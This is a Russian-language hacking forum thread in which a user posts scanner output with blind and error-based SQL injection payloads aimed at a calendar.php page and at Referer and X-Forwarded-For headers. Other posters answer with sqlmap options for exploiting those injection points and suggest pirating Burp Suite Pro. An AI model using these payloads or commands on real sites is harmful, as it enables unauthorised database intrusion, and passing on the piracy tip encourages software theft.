 |
|
21.02.2016, 15:08
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
А есть альтернатива акунетиксу?более мощный инструмент?
|
|
|
21.02.2016, 16:33
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
В мапе пишет
[ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) byusing higher verbosity levels
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded GET input order was set to 1,(select case when (3*2*1=6 AND 000513=000513) then 1 else 1*(select table_name from information_schema.tables)end)=1
This vulnerability affects /tools/calendar.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded GET input date was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/
Подскажите как раскрутить мапом |
|
|
|
21.02.2016, 17:04
|
|
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
С нами:
7561046
Репутация:
11
|
|
Сообщение от .Light.
↑
А есть альтернатива акунетиксу?более мощный инструмент?
Мне в соседней теме owasp zap посоветовали.
|
|
|
|
27.02.2016, 12:25
|
|
Участник форума
Регистрация: 16.01.2014
Сообщений: 113
С нами:
6485366
Репутация:
1
|
|
Сообщение от .Light.
↑
А есть альтернатива акунетиксу?более мощный инструмент?
альтернатив полно, самые крутые штуки которыми я пользовался в kali linux это были - OWASP OWTF и OWASP Zed Attack
Можно использовать ещё Nessus интегрируя его с Metasploit кстати в Metasploit тоже полно модулей для тестирования. Ну и конечно же можно использовать мой любимый
OpenVAS желательно новую версия.. А если ты хочешь получить 100% результат и быть гуру в веб хакинге юзай как все нормальские пен-тестеры
Burp Suite только желательно найди pro в сети вроде на каком то торентрекере видел.
|
|
|
|
11.03.2016, 21:06
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
Referer: 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR( 104),CHAR(115),CHAR(68),CHAR(121),CHAR(72),CHAR(69 ),CHAR(108)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: PHPSESSID=jhhavo515jluqct43if2tj7fp3
как sqlmap"om раскрутить такую скулю?
|
|
|
|
11.03.2016, 21:07
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
--referer="1*"
|
|
|
|
15.03.2016, 22:02
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами:
8334326
Репутация:
0
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?
|
|
|
|
15.03.2016, 22:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от .Light.
↑
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?
гуглить вообще пробовали?
--header="X-Forwarded-For: 1*"
|
|
|
|
15.03.2016, 22:31
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
|
|
|
|
16.03.2016, 17:15
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Настоятельно рекомендую запомнить Опцию
--wizard- Это опция помощник , sqlmap будет задавать тебе вопросы и на основании твоих ответов будет делать то ли и иное действие. тебе остаётся лишь жать кнопку , одну из двух
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
